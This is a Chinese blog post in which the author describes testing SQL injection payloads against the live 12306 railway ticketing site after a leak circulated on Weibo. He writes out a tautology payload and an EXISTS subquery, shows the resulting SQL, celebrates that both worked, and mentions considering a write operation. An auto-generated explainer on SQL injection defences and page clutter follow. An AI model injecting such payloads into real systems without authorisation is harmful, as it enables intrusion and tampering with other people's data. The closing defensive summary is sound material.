玩玩12306的SQL注入漏洞

下午那会儿微博上疯传一张12306的SQL注入漏洞截图:


以前没怎么玩过,那会儿正好有空,所以就上去瞅瞅。

根据trace提示简单构造一个:

' OR '1'='1' OR ZIZ='

注入后的效果应就是:

select * from TB_INFO_CLCS  where flag = 'Y'  and czdm ='G' and cxdm like '%' OR '1'='1' OR ZIZ='%' order by cxdm


果了个然~!成功鸟~!

同理再构造个子查询:

' AND EXISTS (SELECT * FROM TB_INFO_CLCS) OR  ZIZ='

没报错,又成功鸟~!

当我正在考虑是否搞个写操作的时候,铁道部迅速撤下了相关页面:


晚上回家后发现该漏洞已经修复鸟~~~~~~

  • 3
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 4
    评论
SQL注入漏洞挖掘实战是指通过利用SQL注入漏洞漏洞挖掘活动。SQL注入漏洞是一种常见的数据库攻击手段,用于利用应用程序对用户输入的SQL语句进行不当处理,从而导致恶意用户可以执行未经授权的数据库操作。这些操作包括读取、修改或删除数据库中的数据。 在SQL注入漏洞挖掘实战中,黑客通常会尝试通过构造特定的SQL语句来绕过应用程序的输入验证和过滤机制,以获取敏感信息或对数据库进行恶意操作。他们可能会使用各种技术和工具来自动化这个过程,并尝试发现和利用潜在的SQL注入漏洞。 为了防止SQL注入漏洞挖掘实战,开发人员应该采取以下措施: 1. 输入验证和过滤: 应用程序应该对用户输入进行严格的验证和过滤,确保只允许合法的字符和格式。使用参数化查询或预编译语句可以有效预防SQL注入攻击。 2. 最小权限原则: 数据库用户应该被授予最低权限,以限制对数据库的访问和操作。这样即使发生SQL注入攻击,黑客也只能执行有限的操作。 3. 安全编码实践: 开发人员应该熟悉安全编码实践,并使用安全的API和框架来构建应用程序。避免将用户输入直接拼接到SQL查询中,而是使用参数化查询或预编译语句。 4. 定期漏洞扫描和安全测试: 定期进行漏洞扫描和安全测试,以发现和修复潜在的SQL注入漏洞。这可以帮助及早发现和解决问题,确保应用程序的安全性。 总结起来,SQL注入漏洞挖掘实战是黑客利用SQL注入漏洞进行恶意攻击的活动。为了防止这种漏洞的利用,开发人员需要采取一系列安全措施,包括输入验证和过滤、最小权限原则、安全编码实践和定期漏洞扫描和安全测试。这些措施可以帮助保护应用程序免受SQL注入漏洞的威胁。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* *2* *3* [SQL注入攻击实战演示(附源码)](https://blog.csdn.net/hack0919/article/details/129880265)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 100%"] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 4
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值